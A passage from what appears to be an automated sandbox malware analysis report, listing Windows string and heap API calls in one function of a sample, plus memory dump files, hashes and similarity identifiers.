                                                    • Instruction Fuzzy Hash: 9BF0FF76900119FB8F11DFA9CC84CDF7BACEF592547158066FE08D7111E636EA14ABA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
                                                    • lstrlen.KERNEL32(?), ref: 010911BB
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
                                                    • lstrcat.KERNEL32(00000000,?), ref: 010911DA
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                    • String ID:
                                                    • API String ID: 74227042-0
                                                    • Opcode ID: ded5d63ae578844f954d73775a733aac3a4a770bdee79d1c8491baed7aba79e7
                                                    • Instruction ID: 86ce359da9e08bc4b9b7f2c3966dfcd78d40e8dfcdb72c13aeedaf12dcbb18ee
                                                    • Opcode Fuzzy Hash: ded5d63ae578844f954d73775a733aac3a4a770bdee79d1c8491baed7aba79e7
                                                    • Instruction Fuzzy Hash: DEE09273601621AB8F219BE8AC58C6FBBACFFD9660304441AFA50D3104C73A98019BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%